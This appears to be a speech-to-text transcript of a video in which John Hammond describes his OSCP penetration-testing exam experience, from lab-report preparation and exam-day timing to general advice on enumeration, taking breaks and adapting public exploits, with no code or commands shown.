 Hey, what's going on everybody? My name is John Hammond and in this video I wanted to talk about my OSCP experience or the Offensive Security Certified Professional Exam. So I know there are already a ton of these videos and blogs and articles out on the internet already. It's kind of like an obligatory thing you have to do after you take the OSCP exam. So this is my take. I hope you enjoy. First I need to give kind of a disclaimer. This video is not intended to come across with any, I don't know, I don't want to come across like some pretentious, arrogant, jerk guy I did not expect for the exam to go the way that it did. So I had got 30 days of lab access which is that preliminary, okay you have the time to prep and prepare the PWK course before you take the OSCP exam. I got 30 days so I would have time to practice. I was busy during the first month, I got it in August, the exam time, I'm sorry my lab at time was going to end on September 10th and I was at DerbyCon while that was going to happen. So I ended up getting 15 days more so I could keep cramming because I made it my goal to make sure that I would complete the lab report. You know that's an optional thing, like you don't have to do it. It will give you 5 extra points or 5 bonus points if you need it on the exam but you need to break into 10 of the lab machines at least and complete all of the exercises and there are so many exercises. It took forever, I spent way too much time on that but I made sure that I got it because I wanted to ensure that no matter what happened, if maybe I was just at the brink at the cusp of passing and I needed, oh 5 points that would have been it, I would have been smooth sailing. I didn't want to let myself be kicking myself later if I wasn't going to pass just by 5 points so I made sure that I got that done. I wanted to put in as much padding as possible and my report for the lab report was 240 pages. It was huge. I took a lot of screenshots. That's something that I swear by, take as much screenshots as you can and I ended up using a kind of markdown to PDF converter which was super nice. So I just didn't have to leave sublime text which is where I was already taking notes and just easy quick take a screenshot, copied into my home directory, moved into the directory I need and then here's a quick link for that screenshot on markdown. It was awesome and that's what I would recommend to you if you hate dealing with Microsoft Word and OpenOffice and all that crap. So I ended up extending that lab access for 15 days so I could get the lab report done and I scheduled to take my exam on September 22nd which would have been this Sunday. So I got my results back this Wednesday which was today. I got them in the morning but I was taking the exam. It was a Sunday morning. I spent the weekend knowing that I'm going to have to go into work after probably staying up for an all night or 24 hours to take the exam and I would have to go to work and function like a regular human being. I was just going to be a zombie. So Saturday I didn't actually spend a whole lot of time prepping or worrying about the exam. I spent some time with my girlfriend. We went to see a comedy show and it was just get OSCP out of my mind. I didn't want to be concerned with it at the time. When I came to Sunday, I came to start the exam. It was exam day. My test started at 7 in the morning and I got up at 6. I took a shower. I made some eggs for breakfast so I could like, hey, clear my mind, get things ready and my computer was acting up. I turned it on and it was booting with like RAID only and I have a Dell XPS so like it won't boot Ubuntu and I was like, what the crap? Oh my gosh. This is the most annoying thing. I cannot have this when my OSCP exam is about to start and I just needed to go into the BIOS and switch to HCI. It's stupid and frustrating and scared me and I was already nervous and whatever. I needed to clear my mind. I got ready, 7 a.m. It started and we were off the races. So I started with the buffer overflow machine and I would be running scans for the other machines in the background while I was doing that. It took me about an hour to get the buffer overflow machine done and my tips for you, what I would recommend when you're doing the buffer overflow is that you're very likely going to be documenting all the stuff that you do. You're setting it up so that offensive security will be able to replicate your steps. Like the whole point of the report is that so another penetration tester can follow through with what you did and it all makes sense and they can replicate it. So what I would recommend is when you're setting up your callback or whatever you need to do to get shell access on the machine, don't have the machine callback to you but set up your payload and shellcode so that you can go back to it. So that way there's no need for them to regenerate shellcode and there's no need to them to try and create their R host and R port and there's maybe they'll type that in wrong or because they regenerated shellcode with ever encoding it may be include some of the bad characters that you forgot or you missed. So what I would recommend is just make a one way so that you can call back to it not it call back to you and that way you can just say look use this script to use this shellcode and it'll work and that's what you need to do once I was done with the buffer overflow machine. I already had my scans and some enumeration done for the other machines and you know they say enumeration is the key enumeration enumeration enumeration. It's like the most like I hear people say that's the frustrating thing to hear back as an answer when you're trying to ask for help or it's like oh try harder and that annoys people but I have to agree you know enumeration is what's going to give you potentially those avenues those routes to go down those roads to look at that maybe you'll find your initial foothold and compromise I took a lot of breaks like I would get up I'd get off the keyboard I would just say hey I got to go take a break and 10 minutes 15 minutes I would take a break every hour at least maybe if I was in the zone I was working on something I took a break at but after two hours and then I would get back out I just kind of clear my head pace around the house I literally do that so many times review what I had because I was like okay I got low privilege access here I've got another thing here and maybe I still need to figure out what I need to do on that machine and it was I was all over the place I was taking notes into blind text I had my enumeration set but I needed to take breaks and I want to reiterate that to you take breaks do not just power through 24 hours of an exam when you're hurting right it's a stressful thing so my tweak on the try harder answer that people will give to you is take a break and try again don't try harder I know that's the frustrating thing to hear it's like you're already trying hard enough you're already trying you wouldn't be doing this if you weren't trying but try your process again like go back go take a look at that those scan results go poke those ports one more time even the ones that you didn't think that might mean anything because they're there purposefully they're there for a reason like I would eventually and this happened I looked at a port a protocol and a port I was like I didn't even know I could enumerate this thing and then I was like oh these are the pieces the puzzle this is why this is why this is here and this makes sense now I can use this to leverage and stage something and I would be able to get on to that machine I did not use Metasploit I didn't use Metasploit at all I use MSF venom right to craft our payloads and get our shellcode but I had no need to use Metasploit because the process was look through our scripts look through okay our scan results look through everything that we enumerated and then do our research look if there's any known exploits and there always are that's the idea of this is being able to track down the exploit see the vulnerability know how to adapt and just and tweak that exploit another benefit of having that lab report is that a lot of your work is already done so if there's something like hey I know how to do this I know I know what I'm up against I know what syntax I need I just I I can just control F real quickly in my lab report and bang it out and there it is having those as your notes and some of already documentation is an awesome thing that's again do the lab report I really recommend that so my exam started at seven in the morning and by noon I knew with my lab report that I had more than 70 points to pass I was five hours I told myself hey I'm not going to rely on these five points that's a risk that's a gamble I I want to go for more I want to keep keep eating stuff up so I kept working to get more access enumerating things to try and figure out hey what privates do I need to do how can I actually get a shell in this one last box or the case may be and by three p.m. I compromise everything I had full access on all five of the machines and had all the pictures the screenshots of proof.tex and I was like that's it I'm gonna start writing my report now and it's already in markdown everything that I've already been doing in Sublime Tech so quick and easy I spent the next six hours of that time that I had and I and I spent eight hours to take go through the boxes to take the exam then I went to do my report and I was done by 9 p.m. I was really ecstatic and pleased and just happy that hey I was able to put all these puzzle pieces together because that was it I was finding just tracking things down and looking for things and what I can suggest to you is to practice and play and try and don't give up yeah the try harder manifesto is there and sometimes it's it's painful to hear but it's not it's not strictly try harder it's it's keep trying and take a step back and look through your results from what Lynn Enum, Lynn Privchecker, Sherlock and Watson and all those other things if you keep mulling through that and drowning through that you'll find what it is that you're looking for a lot of times I was in the labs and I it's easy in the lab environment with the machines to just okay drop metasploit here get on the machine and run my enumeration scripts like oh cool I can do a little like kernel exploit and it's quick and easy and it was good in some of those cases but when it came to the real thing you're not gonna have as much luck with some of those kernel techniques so the bare-bones stuff that you need to do enumeration check processes check services check ports that are open check any version numbers with that software look online if there's stuff for that already and that's everything that will get you what you need so those are my tips those are that's that's my experience it was a success I was really really pleased and happy with it and honestly a thing that I kind of want to suggest is it to you is if you don't have whatever support is not I hate saying oh yeah have the support thing but obviously I live with three guys other hackers and I'm engaged in the community between you guys in the discord server and I'll be watching my videos and other in the info set community it's easy to be with great people and they say hey oh hey dude you're taking your OCP like you got this man it's too easy you're gonna crush that thing and sometimes that's what you need that encouragement that goes a long way so as much as a great success as this was for me I am thankful for all of you guys and for those of you that kind of keep track of hey what I'm up to the things that I like to do so thank you you know I can't say it enough I realized that this video is not particularly all-encompassing and I know you guys might have some of your own questions that I'm more than happy to answer I think what I might like to do is do a little stream or ask me anything when we just kind of talk about some of the stuff you guys have more specific questions that I haven't particularly addressed like what do you do when you get stuck in a rabbit hole it's like go take a step back and I think I swear by that and some of those tricks for your buffer overflow and your enumeration and what you're really staring at just don't don't stop keep going take a break clear your mind and then try it again hey thank you guys for watching I hope you enjoyed this I'm really excited about this I'm really pleased I hope you are too you got to go take your O.S.C.P. if you haven't already got it what's next right I want to go churn out O.S.C.E. and then O.S.E.E. next steps in professional development so thank you guys I hope to see you in the next video hope to see you on the discord server and we'll keep chatting love you